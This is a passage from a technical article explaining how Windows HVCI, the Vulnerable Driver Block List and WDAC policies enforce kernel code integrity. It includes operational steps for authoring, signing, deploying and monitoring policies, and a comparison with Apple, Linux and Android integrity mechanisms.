&lt;p&gt;The next four versions of Windows 10 added one capability each. Windows 10 1607 (August 2016) [@wikipedia-w10-history] renamed the feature to HVCI, severed the marketing tie to Device Guard, and added a Windows Security app toggle. Windows 10 1803 (April 2018) [@ms-memory-integrity] added Mode-Based Execution Control reporting on Intel Kabylake-and-later silicon; AMD&apos;s Zen 2 added the equivalent Guest Mode Execute Trap. Older silicon falls back to Restricted User Mode emulation, which the same Microsoft Learn page warns &quot;will have a bigger impact on performance.&quot;&lt;/p&gt;
&lt;p&gt;Windows 10 2004 (May 2020) added Kernel Data Protection (KDP) [@ms-kdp-blog], the second floor of the W$\oplus$X discipline -- once code is unforgeable, attackers shift to data corruption, so KDP makes selected kernel data ranges unforgeable too. Windows 11 22H2 (September 2022) made HVCI on by default for most new Windows 11 devices [@ms-driver-blocklist], and shipped the Vulnerable Driver Block List on by default alongside it.&lt;/p&gt;

Microsoft Learn&apos;s three-name reconciliation is the verbatim quote in the §4b *HVCI / Memory Integrity* Definition above. Three names; one code path; one `SkCi.dll`; one architectural inversion of Blue Pill. We use *HVCI (Memory Integrity in Windows Security)* as the canonical first-mention form and *HVCI* for prose density throughout; a 2017 Microsoft Mechanics video called it *Device Guard*.

flowchart TB
    VTL0[&quot;VTL0 -- NT kernel + CI.dll&lt;br /&gt;&apos;asks&apos; for execute permission&quot;]
    HV[&quot;Hypervisor -- hvix64.exe / hvax64.exe&lt;br /&gt;holds SLAT page tables&quot;]
    VTL1[&quot;VTL1 -- Secure Kernel + SkCi.dll&lt;br /&gt;validates Authenticode + Block List&quot;]
    Page[&quot;Driver image page&lt;br /&gt;state: Writable -&amp;gt; ReadOnly+Execute&quot;]
    VTL0 -- &quot;Secure call: validate image&quot; --&amp;gt; VTL1
    VTL1 -- &quot;If signed and not blocked&quot; --&amp;gt; HV
    HV -- &quot;Flip SLAT entry W-&amp;gt;X&quot; --&amp;gt; Page
    Page -- &quot;Future write from VTL0&quot; --&amp;gt; HV
    HV -- &quot;Page-fault, no transition&quot; --&amp;gt; VTL0
&lt;p&gt;By 2022 the two rails had converged at the operational level. The Driver Block List shipped as a standalone WDAC policy that HVCI&apos;s &lt;code&gt;SkCi.dll&lt;/code&gt; enforced in VTL1 on every kernel-mode driver load. Now we can finally answer the question that opened this article: which Windows component refused the BYOVD load? The honest answer is &lt;em&gt;both rails working together at the page-fault&lt;/em&gt;. That sequence is the next section.&lt;/p&gt;
&lt;h2&gt;5. The Breakthrough: The Runtime Enforcement Loop, End-to-End&lt;/h2&gt;
&lt;p&gt;Open &lt;code&gt;Process Monitor&lt;/code&gt;, watch a kernel driver load, and the human-readable output is &lt;code&gt;IRP_MJ_CREATE&lt;/code&gt; returns success. Open &lt;code&gt;WinDbg&lt;/code&gt; against a kernel-mode debugger session, set a breakpoint on &lt;code&gt;SeCodeIntegrityVerifySection&lt;/code&gt;, watch the same load, and roughly forty distinct trust decisions happen between &lt;code&gt;NtCreateSection&lt;/code&gt; and the moment the driver&apos;s &lt;code&gt;DriverEntry&lt;/code&gt; is allowed to execute. The forty-decision shape is folk knowledge from the kernel-debugger community; the architecture that produces it is documented. Here is the seven-step walk that wraps it.&lt;/p&gt;
&lt;p&gt;The first step is &lt;code&gt;NtCreateSection&lt;/code&gt;. The kernel parses the PE image, locates the Authenticode signature in the directory entry of the optional header, and resolves the signature&apos;s PKCS#7 envelope. Step two: &lt;code&gt;SeCodeIntegrityVerifySection&lt;/code&gt; calls into &lt;code&gt;CI.dll&lt;/code&gt; [@ms-acfb-overview] under &lt;code&gt;\Windows\System32\&lt;/code&gt;. &lt;code&gt;CI.dll&lt;/code&gt; builds a SignerHash structure for the PE -- the bound publisher identity, the leaf certificate hash, the cryptographic page-hash table -- and then opens the policy state under &lt;code&gt;C:\Windows\System32\CodeIntegrity\CIPolicies\Active\&lt;/code&gt;.The exact function names here -- &lt;code&gt;SeCodeIntegrityVerifySection&lt;/code&gt;, &lt;code&gt;CipMincryptValidateImageHeader&lt;/code&gt; -- are kernel-debugger artefacts; the Microsoft Learn page on memory integrity [@ms-memory-integrity] confirms only the higher-level &quot;kernel mode code integrity process&quot; terminology. We name the functions because the debugger view is the only way to see the loop in motion; treat them as kernel-debugger paraphrase, not as Microsoft Learn quotes.&lt;/p&gt;
&lt;p&gt;Step three is the policy state machine. The walk has a fixed precedence. Explicit deny rules win first -- this is where the Driver Block List entry for &lt;code&gt;dbutil_2_3.sys&lt;/code&gt; [@ms-driver-blocklist] terminates the load. Explicit allow rules are next, then signer-level rules, then Intelligent Security Graph cloud verdicts (when rule option 14 is enabled) [@ms-isg], and finally the Mark-of-the-Web disposition for the file. For a kernel-mode driver, step four forwards the verdict into VTL1 via a &lt;em&gt;secure call&lt;/em&gt; -- the hypervisor-mediated cross-VTL invocation primitive that Microsoft introduced for VBS [@paragmali-com-the-en].&lt;/p&gt;
&lt;p&gt;In step five, &lt;code&gt;SkCi.dll&lt;/code&gt; [@github-com-20alex20ionescu20-20201520blackhat2015] inside VTL1 revalidates the Authenticode signature against its own trusted-root set, consults the per-VTL SLAT page-table state for the proposed image pages, checks the policy&apos;s &lt;code&gt;HvciOptions&lt;/code&gt; element, and only then permits the hypervisor to flip the relevant SLAT entries from W to X.&lt;/p&gt;
&lt;p&gt;Step six returns control to the loader; the driver&apos;s image is now executable in VTL0 and its pages are read-only from VTL0&apos;s perspective for the lifetime of the load. Step seven is the safety net: any later attempt to write to those pages from VTL0 -- a kernel exploit, a malicious driver, an attacker with a kernel debugger attached -- page-faults at the SLAT layer, intercepted by the hypervisor [@ms-hyperv-bounty] (&lt;code&gt;hvix64.exe&lt;/code&gt; on Intel, &lt;code&gt;hvax64.exe&lt;/code&gt; on AMD), not by the kernel that the attacker may already control.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Code integrity at every layer is not a slogan. It is a page-fault sequence that runs dozens of times during one driver load. Step five is the architectural inversion: VTL1 holds the validation key, VTL0 cannot reach VTL1, and the hypervisor enforces the separation in silicon-mediated SLAT entries.&lt;/p&gt;
&lt;/blockquote&gt;

sequenceDiagram
    participant L as NT Loader
    participant CI as CI.dll (VTL0)
    participant Pol as Active policy state
    participant Hv as Hypervisor (hvix64.exe)
    participant Sk as SkCi.dll (VTL1)
    participant SLAT as SLAT page tables
    L-&amp;gt;&amp;gt;CI: NtCreateSection(image)
    CI-&amp;gt;&amp;gt;CI: Parse Authenticode + page-hash table
    CI-&amp;gt;&amp;gt;Pol: Lookup C:\Windows\System32\CodeIntegrity\CIPolicies\Active\
    Pol--&amp;gt;&amp;gt;CI: Verdict (deny / allow / signer / ISG)
    CI-&amp;gt;&amp;gt;Hv: Secure call: revalidate this kernel image
    Hv-&amp;gt;&amp;gt;Sk: Forward to VTL1
    Sk-&amp;gt;&amp;gt;Sk: Re-check signature + Block List
    Sk--&amp;gt;&amp;gt;Hv: PASS or FAIL
    Hv-&amp;gt;&amp;gt;SLAT: If PASS, flip page state W -&amp;gt; X (read-only execute)
    SLAT--&amp;gt;&amp;gt;L: DriverEntry executes in VTL0
    Note over SLAT,Hv: Future VTL0 write to these pages -&amp;gt; SLAT page-fault
&lt;p&gt;The seven-step walk maps cleanly onto a small reference table that any administrator should have on a sticky note. The event IDs in the right column are the &lt;code&gt;Microsoft-Windows-CodeIntegrity/Operational&lt;/code&gt; channel [@ms-driver-blocklist] entries that show up in Event Viewer under each verdict.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Step&lt;/th&gt;
&lt;th&gt;Component&lt;/th&gt;
&lt;th&gt;File path&lt;/th&gt;
&lt;th&gt;Event on failure&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;NT loader&lt;/td&gt;
&lt;td&gt;&lt;code&gt;\Windows\System32\ntoskrnl.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(kernel STATUS code)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;CI engine&lt;/td&gt;
&lt;td&gt;&lt;code&gt;\Windows\System32\CI.dll&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;3023 (audit) / 3024 (enforce)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;Policy state&lt;/td&gt;
&lt;td&gt;&lt;code&gt;\Windows\System32\CodeIntegrity\CIPolicies\Active\*.cip&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;3076 (UMCI) / 3077 (UMCI enforce)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;Secure call&lt;/td&gt;
&lt;td&gt;&lt;code&gt;\Windows\System32\securekernel.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(cross-VTL trace)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;5&lt;/td&gt;
&lt;td&gt;Secure CI&lt;/td&gt;
&lt;td&gt;VTL1-resident &lt;code&gt;SkCi.dll&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;3033 (driver block) / 3034 (driver audit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;6&lt;/td&gt;
&lt;td&gt;Hypervisor SLAT flip&lt;/td&gt;
&lt;td&gt;&lt;code&gt;\Windows\System32\hvix64.exe&lt;/code&gt; / &lt;code&gt;hvax64.exe&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;(hypervisor trace)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;7&lt;/td&gt;
&lt;td&gt;Page-fault safety net&lt;/td&gt;
&lt;td&gt;Hypervisor&lt;/td&gt;
&lt;td&gt;SLAT violation crash&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The hardware feature -- Intel Extended Page Tables, AMD Rapid Virtualization Indexing -- that the hypervisor uses to translate guest physical addresses to host physical addresses one level deeper than the OS&apos;s own page tables. Because SLAT entries are *under* the OS&apos;s view, a kernel attacker in VTL0 can change the OS&apos;s page tables but cannot reach the SLAT entries the hypervisor maintains. HVCI uses SLAT permission bits to hold the W$\oplus$X invariant for kernel pages; KDP uses them to hold read-only memory for kernel data sections.

The Event Viewer channel under `Microsoft-Windows-CodeIntegrity/Operational` that records every WDAC + HVCI verdict. Six event IDs carry the operational load: 3023 (kernel-mode audit), 3024 (kernel-mode enforced block), 3033 (driver block by Block List), 3034 (driver audit), 3076 (user-mode audit), and 3077 (user-mode enforced block) [@ms-event-id-explanations]. All six are JSON-shaped after Windows 11 22H2 and parse cleanly into Defender for Endpoint advanced hunting.The cited Microsoft Learn page enumerates 3033, 3034, 3076, and 3077 verbatim, and adjacent IDs 3004 (kernel driver invalid signature), 3089 (signature info correlation), and 3095-3105 (policy activation/refresh). 3023 and 3024 are kernel-debugger-observable IDs in the same `Microsoft-Windows-CodeIntegrity/Operational` channel and surface in `Get-WinEvent` queries against that channel; treat the 3023/3024 row as kernel-debugger paraphrase rather than as Microsoft Learn enumeration.
&lt;p&gt;The third visual for this section is the Win32_DeviceGuard decoder a 2026 administrator runs to confirm the loop is actually live on a representative endpoint. The WMI surface decodes a small set of magic numbers that map to silicon and hypervisor capabilities.&lt;/p&gt;
&lt;p&gt;{`
// Demonstrates the logic of:
//   Get-CimInstance -ClassName Win32_DeviceGuard
//     -Namespace root\Microsoft\Windows\DeviceGuard
//
// AvailableSecurityProperties returns an array of small integers.
// Decode them against the Microsoft Learn-documented mapping.
const SECURITY_PROPS = {
  1: &apos;Hypervisor support (VBS-capable CPU)&apos;,
  2: &apos;Secure Boot is available&apos;,
  3: &apos;DMA protection is available&apos;,
  4: &apos;Secure Memory Overwrite is available&apos;,
  5: &apos;NX protections are available&apos;,
  6: &apos;SMM mitigations are available&apos;,
  7: &apos;MBEC/GMET is available (Intel Kabylake+ / AMD Zen 2+)&apos;,
  8: &apos;APIC virtualization is available&apos;,
};&lt;/p&gt;
&lt;p&gt;// Pretend we just received this from a remote endpoint:
const sample = {
  AvailableSecurityProperties: [1, 2, 3, 5, 7],
  VirtualizationBasedSecurityStatus: 2, // 2 = running
  SecurityServicesRunning: [2],         // 2 = HVCI active
};&lt;/p&gt;
&lt;p&gt;console.log(&apos;VBS status:&apos;,
  sample.VirtualizationBasedSecurityStatus === 2 ? &apos;RUNNING&apos; : &apos;OFF&apos;);
console.log(&apos;HVCI:&apos;,
  sample.SecurityServicesRunning.includes(2) ? &apos;ACTIVE&apos; : &apos;INACTIVE&apos;);
console.log(&apos;Capabilities:&apos;);
for (const id of sample.AvailableSecurityProperties) {
  console.log(&apos;  -&apos;, SECURITY_PROPS[id] || (&apos;unknown:&apos; + id));
}
`}&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Joanna Rutkowska&apos;s Blue Pill [@en-wikipedia-org-wiki-bluepillsoftware]) argued in 2006 that the hypervisor was the attacker&apos;s substrate to fear. HVCI inverts the argument nine years later: the hypervisor becomes the &lt;em&gt;defender&apos;s&lt;/em&gt; substrate, hosting the trust check below the kernel an attacker may have compromised. A SYSTEM-level kernel attacker cannot reach VTL1; the hypervisor enforces the separation in SLAT entries that VTL0 cannot edit. The same hardware feature that made Rutkowska&apos;s rootkit possible is the hardware feature that makes HVCI&apos;s W$\oplus$X invariant enforceable.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We now have an answer to the question that opened section one. When &lt;code&gt;dbutil_2_3.sys&lt;/code&gt; loaded against a default Windows 11 24H2 box with HVCI on, step five happened. &lt;code&gt;SkCi.dll&lt;/code&gt; consulted the Vulnerable Driver Block List [@ms-driver-blocklist] inside its own active policy state, matched the file hash against the published deny entry for CVE-2021-21551 [@nvd-cve-2021-21551], refused the SLAT promotion, and the load failed with event 3033. Eight microseconds. The same loop runs on every driver load on every HVCI-enabled Windows 11 device on the planet. Now we have to &lt;em&gt;operate&lt;/em&gt; it.&lt;/p&gt;
&lt;h2&gt;6. State of the Art: Authoring, Signing, Deploying, Monitoring&lt;/h2&gt;
&lt;p&gt;Knowing how the loop works is necessary; running it is the actual job. A 2026 Windows estate that wants the eight-microsecond refusal to fire on its own endpoints needs five operational disciplines, in this order: authoring, audit-mode discovery, signing, deployment, and monitoring.&lt;/p&gt;
&lt;h3&gt;6.1 Authoring&lt;/h3&gt;
&lt;p&gt;Authoring starts from one of the example base policies [@ms-example-policies] Microsoft ships under &lt;code&gt;%OSDrive%\Windows\schemas\CodeIntegrity\ExamplePolicies\&lt;/code&gt;. The directory contains &lt;code&gt;DefaultWindows_Audit.xml&lt;/code&gt; (a sane starting allowlist that runs in audit mode), &lt;code&gt;AllowMicrosoft.xml&lt;/code&gt;, &lt;code&gt;AllowAll.xml&lt;/code&gt;, &lt;code&gt;AllowAll_EnableHVCI.xml&lt;/code&gt;, &lt;code&gt;DenyAllAudit.xml&lt;/code&gt;, and the canonical &lt;code&gt;SmartAppControl.xml&lt;/code&gt; / &lt;code&gt;SignedReputable.xml&lt;/code&gt; [@ms-example-policies] consumer-grade template. There is also &lt;code&gt;RecommendedDriverBlock_Enforced.xml&lt;/code&gt; -- the on-disk form of the Vulnerable Driver Block List -- and the S-mode templates &lt;code&gt;WinSiPolicy.xml&lt;/code&gt; and &lt;code&gt;WinSEPolicy.xml&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The PowerShell call that mints a new base policy is &lt;code&gt;New-CIPolicy -Level FilePublisher -Fallback SignedVersion,FilePublisher,Hash -UserPEs -MultiplePolicyFormat&lt;/code&gt;. The &lt;code&gt;-Level&lt;/code&gt; flag picks one of the eight rule-level identities [@ms-rule-options] -- &lt;code&gt;Hash&lt;/code&gt;, &lt;code&gt;FilePath&lt;/code&gt;, &lt;code&gt;FileName&lt;/code&gt;, &lt;code&gt;FilePublisher&lt;/code&gt;, &lt;code&gt;LeafCertificate&lt;/code&gt;, &lt;code&gt;PcaCertificate&lt;/code&gt;, &lt;code&gt;RootCertificate&lt;/code&gt;, and the WHQL family -- in increasing order of brittleness-to-strictness tradeoff. &lt;code&gt;FilePublisher&lt;/code&gt; is the modern default for most enterprise scenarios because it scopes trust to a publisher tuple plus a product name plus a binary name plus a minimum version, rather than an unbounded &quot;anything from this signer&quot; allowance.&lt;/p&gt;

A WDAC rule option (rule option 13 [@ms-rule-options], first shipped in Windows 10 1703 in April 2017 [@ms-2017-wdac-blog]) that delegates trust to a configured set of installer processes -- typically Configuration Manager or Intune. Files dropped by a Managed Installer inherit a &quot;trusted&quot; attribute and are allowed to run without an explicit allowlist entry. Managed Installer is the canonical answer to &quot;how do you deploy software to a fleet that runs an enforced WDAC policy.&quot;
&lt;h3&gt;6.2 Audit-mode discovery&lt;/h3&gt;
&lt;p&gt;Audit mode is the architectural prerequisite for not bricking your fleet. Microsoft Learn [@ms-rule-options] is unambiguous: &quot;We recommend that you use &lt;code&gt;Enabled:Audit Mode&lt;/code&gt; initially because it allows you to test new App Control policies before you enforce them. With audit mode, applications run normally but App Control logs events whenever a file runs that isn&apos;t allowed by the policy.&quot; &lt;code&gt;Set-RuleOption -Option 3&lt;/code&gt; on the policy XML enables audit mode; &lt;code&gt;Set-RuleOption -Option 3 -Delete&lt;/code&gt; removes it and switches the policy into enforce mode. In between, the SOC harvests &lt;code&gt;Microsoft-Windows-CodeIntegrity/Operational&lt;/code&gt; event 3076 entries with &lt;code&gt;Get-WinEvent&lt;/code&gt;, and &lt;code&gt;New-CIPolicy -Audit&lt;/code&gt; mints a &lt;em&gt;discovery&lt;/em&gt; policy from the observed blocks that you can merge into the base.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Run audit mode against a representative subset of your estate -- not the whole fleet, not just one developer laptop -- and iterate &lt;code&gt;New-CIPolicy -Audit -&amp;gt; merge -&amp;gt; redeploy&lt;/code&gt; until the audit-event volume goes near-zero. &lt;em&gt;Then&lt;/em&gt; delete rule option 3 and switch the same policy to enforce. Most production failures of WDAC rollouts are not policy bugs; they are skipped audit discipline.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;6.3 Signing&lt;/h3&gt;
&lt;p&gt;A signed WDAC policy is an order of magnitude harder to disable than an unsigned one. The signing ceremony has a fixed shape: &lt;code&gt;Add-SignerRule -Update&lt;/code&gt; to add the signer that may replace the policy in future, &lt;code&gt;Set-RuleOption -Option 6 -Delete&lt;/code&gt; to drop &quot;Enabled:Unsigned System Integrity Policy&quot; so the policy refuses to load unless signed, &lt;code&gt;ConvertFrom-CIPolicy&lt;/code&gt; to produce the binary &lt;code&gt;.cip&lt;/code&gt;, and &lt;code&gt;signtool.exe&lt;/code&gt; with an RSA-2048-or-larger certificate to attach the signature. Microsoft Learn documents the signed-policy prerequisites [@ms-rule-options]: Secure Boot [@paragmali-com-to-userini] must be on; ECDSA certificates are explicitly unsupported; and the policy&apos;s &lt;code&gt;VersionEx&lt;/code&gt; must be monotonically increasing across replacements.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A botched signed-policy update -- a &lt;code&gt;VersionEx&lt;/code&gt; rollback, a wrong signer, a missing &lt;code&gt;UpdatePolicySigner&lt;/code&gt; for the new signer -- can leave a Windows machine unable to boot. The boot-time Code Integrity check refuses the policy, the kernel refuses to start without a valid policy, and the operator is left at a recovery console with no in-band way to fix it. Always validate a policy update on a representative subset &lt;em&gt;before&lt;/em&gt; fleet rollout.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;6.4 Deployment and stacking&lt;/h3&gt;
&lt;p&gt;Multiple-policy WDAC is the deployment model since Windows 10 1903 [@ms-deploy-multi]. Up to thirty-two active policies sit in &lt;code&gt;C:\Windows\System32\CodeIntegrity\CIPolicies\Active\&lt;/code&gt;, or unlimited on devices that have the April 9, 2024 cumulative update [@ms-deploy-multi]. Base-and-supplemental composition (&lt;code&gt;&amp;lt;SupplementalPolicySigner&amp;gt;&lt;/code&gt;) lets a divisional supplemental policy union into a corporate base. The &lt;code&gt;&amp;lt;HvciOptions&amp;gt;&lt;/code&gt; element toggles HVCI from inside the policy XML itself. The published &lt;code&gt;RecommendedDriverBlock_Enforced.xml&lt;/code&gt; [@ms-driver-blocklist] policy is designed to stack alongside an organisation&apos;s allowlist without merging.&lt;/p&gt;
&lt;p&gt;Deployment surfaces today are: the Intune App Control for Business CSP [@ms-acfb-landing], Configuration Manager&apos;s App Control task sequence, and Group Policy. Group Policy supports only the single-policy format on Windows Server 2016 and 2019 -- a structural reason to prefer Intune or ConfigMgr for any fleet that wants modern multi-policy stacking.&lt;/p&gt;

flowchart LR
    A[DefaultWindows_Audit.xml]
    B[Set-RuleOption -Option 3&lt;br /&gt;Deploy in audit mode]
    C[Get-WinEvent CodeIntegrity-Operational&lt;br /&gt;collect event 3076]
    D[New-CIPolicy -Audit&lt;br /&gt;mint supplemental from blocks]
    E[Merge supplemental + base]
    F[Set-RuleOption -Option 3 -Delete]
    G[ConvertFrom-CIPolicy + signtool]
    H[Deploy enforced via Intune / ConfigMgr]
    A --&amp;gt; B --&amp;gt; C --&amp;gt; D --&amp;gt; E --&amp;gt; C
    E --&amp;gt; F --&amp;gt; G --&amp;gt; H
&lt;h3&gt;6.5 Monitoring&lt;/h3&gt;
&lt;p&gt;Monitoring rests on two telemetry sources. The first is the &lt;code&gt;Microsoft-Windows-CodeIntegrity/Operational&lt;/code&gt; channel [@ms-event-id-explanations] on the endpoint, with the six event IDs from section five. The second is Defender for Endpoint advanced hunting [@ms-asr-rules], where the &lt;code&gt;DeviceEvents&lt;/code&gt; table carries &lt;code&gt;AppControlExecutableAudited&lt;/code&gt;, &lt;code&gt;AppControlExecutableBlocked&lt;/code&gt;, and &lt;code&gt;AppControlCodeIntegrityDriverRevoked&lt;/code&gt; rows. The two stitch together: a single 3033 event on the endpoint maps to a single &lt;code&gt;AppControlCodeIntegrityDriverRevoked&lt;/code&gt; row in the SIEM.&lt;/p&gt;
&lt;p&gt;The third leg of the monitoring tripod is the Defender Attack Surface Reduction rule with GUID &lt;code&gt;56a863a9-875e-4185-98a7-b882c64b5ce5&lt;/code&gt; [@ms-vmdrc-blog] -- &lt;em&gt;Block abuse of exploited vulnerable signed drivers&lt;/em&gt;. The ASR rule lives in Defender for Endpoint and fires regardless of whether HVCI is on, which makes it the canonical safety net for endpoints that are HVCI-incapable or that have HVCI temporarily disabled for compatibility.&lt;/p&gt;

A Defender for Endpoint rule shipped as part of the Microsoft 365 Defender suite. ASR rules sit one layer above the kernel CI engine and trigger on behavioural conditions -- a vulnerable signed driver loading, an Office macro spawning a child process, a script host writing an executable. The vulnerable-driver ASR rule pairs with the Driver Block List as the EDR-side telemetry partner: HVCI blocks the load, ASR records the attempt, and the SOC gets a complete narrative even when the loader retried multiple times.
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Event ID&lt;/th&gt;
&lt;th&gt;Phase&lt;/th&gt;
&lt;th&gt;Audience&lt;/th&gt;
&lt;th&gt;Meaning&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;3023&lt;/td&gt;
&lt;td&gt;Audit&lt;/td&gt;
&lt;td&gt;Kernel-mode&lt;/td&gt;
&lt;td&gt;Driver would have been blocked (audit)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3024&lt;/td&gt;
&lt;td&gt;Enforce&lt;/td&gt;
&lt;td&gt;Kernel-mode&lt;/td&gt;
&lt;td&gt;Driver blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3033&lt;/td&gt;
&lt;td&gt;Enforce&lt;/td&gt;
&lt;td&gt;Kernel-mode&lt;/td&gt;
&lt;td&gt;Driver blocked by Block List rule&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3034&lt;/td&gt;
&lt;td&gt;Audit&lt;/td&gt;
&lt;td&gt;Kernel-mode&lt;/td&gt;
&lt;td&gt;Driver allowed but matched audit&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3076&lt;/td&gt;
&lt;td&gt;Audit&lt;/td&gt;
&lt;td&gt;User-mode&lt;/td&gt;
&lt;td&gt;Process would have been blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3077&lt;/td&gt;
&lt;td&gt;Enforce&lt;/td&gt;
&lt;td&gt;User-mode&lt;/td&gt;
&lt;td&gt;Process blocked&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The sixth visual for this section is the FilePublisher rule computer -- a JS demo that walks the publisher tuple a &lt;code&gt;New-CIPolicy -Level FilePublisher&lt;/code&gt; invocation extracts from a PE binary.&lt;/p&gt;
&lt;p&gt;{`
// Demonstrates the logic of:
//   New-CIPolicy -Level FilePublisher -Fallback SignedVersion,FilePublisher,Hash
//
// The FilePublisher level scopes trust to: O= + CN= + ProductName + BinaryName
// + minimum Version. Anything from the same publisher with the same product
// and binary names, at or above the version bar, satisfies the rule.
function filePublisherRule(pe) {
  return {
    O: pe.signer.organization,
    CN: pe.signer.commonName,
    ProductName: pe.versionInfo.productName,
    BinaryName: pe.versionInfo.originalFilename,
    MinimumVersion: pe.versionInfo.fileVersion,
  };
}&lt;/p&gt;
&lt;p&gt;const peSample = {
  signer: { organization: &apos;Microsoft Corporation&apos;, commonName: &apos;Microsoft Windows&apos; },
  versionInfo: {
    productName: &apos;Microsoft Windows Operating System&apos;,
    originalFilename: &apos;powershell.exe&apos;,
    fileVersion: &apos;10.0.26100.1&apos;,
  },
};&lt;/p&gt;
&lt;p&gt;const rule = filePublisherRule(peSample);
console.log(&apos;Generated FilePublisher rule:&apos;);
for (const [k, v] of Object.entries(rule)) console.log(&apos;  &apos; + k + &apos; = &apos; + v);
console.log(&apos;Anything at or above version&apos;, rule.MinimumVersion, &apos;will satisfy this rule.&apos;);
`}&lt;/p&gt;
&lt;p&gt;The consumer cousin of WDAC is Smart App Control [@ms-sac-support], which runs the same &lt;code&gt;CI.dll&lt;/code&gt; against an example policy (&lt;code&gt;SmartAppControl.xml&lt;/code&gt;, also shipped as &lt;code&gt;SignedReputable.xml&lt;/code&gt;). Smart App Control is opt-in at clean-install time on consumer Windows 11 24H2, with cloud reputation as the primary verdict source and Authenticode as the fallback. There is, by design, &quot;no way to bypass Smart App Control protection for individual apps.&quot;&lt;/p&gt;
&lt;p&gt;WDAC + HVCI is now operational on a 2026 Windows estate. But this is not the only design point in the industry, and the design choices Microsoft made -- XML schema, hypervisor-rooted enforcement, per-PE-load evaluation -- become visible only by contrast. Apple, Linux, and Android all answer the same question with different shapes.&lt;/p&gt;
&lt;h2&gt;7. Competing Approaches: Apple, Linux, Android&lt;/h2&gt;
&lt;p&gt;Three other major operating systems answer the question &quot;which code is allowed to run on this device.&quot; None of them answer it the way Windows does. The contrast is what makes the Windows answer visible.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;macOS&lt;/strong&gt; combines Gatekeeper, notarization, System Integrity Protection (SIP, shipped September 16, 2015) [@wikipedia-sip], and the Apple Mobile File Integrity (AMFI) kext. The trust model is single-CA: every executable that wants to run outside the App Store must be signed by an Apple-identified developer and notarized by Apple [@apple-gatekeeper]. There is no XML policy schema for an enterprise to author and sign; the trust list is whatever Apple decides. The closest macOS analogue to HVCI is Kernel Integrity Protection on Apple Silicon [@apple-os-integrity], which together with Fast Permission Restrictions and Pointer Authentication Codes enforces a hardware-rooted kernel-execution invariant -- but the policy is fixed at silicon design time, not configurable by the deploying organisation.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Linux&lt;/strong&gt; ships Integrity Measurement Architecture (IMA), introduced in kernel 2.6.30 in 2009 [@linux-ima], with the Extended Verification Module (EVM) for off-line attack protection and &lt;code&gt;dm-verity&lt;/code&gt; [@wikipedia-dm-verity] for read-only rootfs verification. IMA is the closest Linux analogue to WDAC&apos;s audit pipeline: it can &lt;em&gt;collect&lt;/em&gt; file measurements, &lt;em&gt;store&lt;/em&gt; them in a kernel-resident list (and extend a TPM PCR if hardware is present), &lt;em&gt;attest&lt;/em&gt; them remotely, and &lt;em&gt;appraise&lt;/em&gt; them against a &quot;good&quot; value held in extended attributes. Mainstream desktop and server distributions, however, rarely turn on appraisal. There is no hypervisor-rooted W$\oplus$X-for-the-kernel default in mainstream Linux; the closest analogue is Confidential Computing&apos;s TDX or SEV-SNP overlay, and that is opt-in.&lt;/p&gt;

A Linux device-mapper target that performs Merkle-tree-walk verification of every block read from a backing device, returning EIO on any block whose computed hash does not match the precomputed tree. It is the foundation of Android Verified Boot [@android-verified-boot], and it provides a verified read-only root filesystem on Linux distributions that opt in. The verity target itself is a Linux-kernel feature; the broader device-mapper framework that hosts it is also available in NetBSD and DragonFly BSD [@wikipedia-dm-verity].
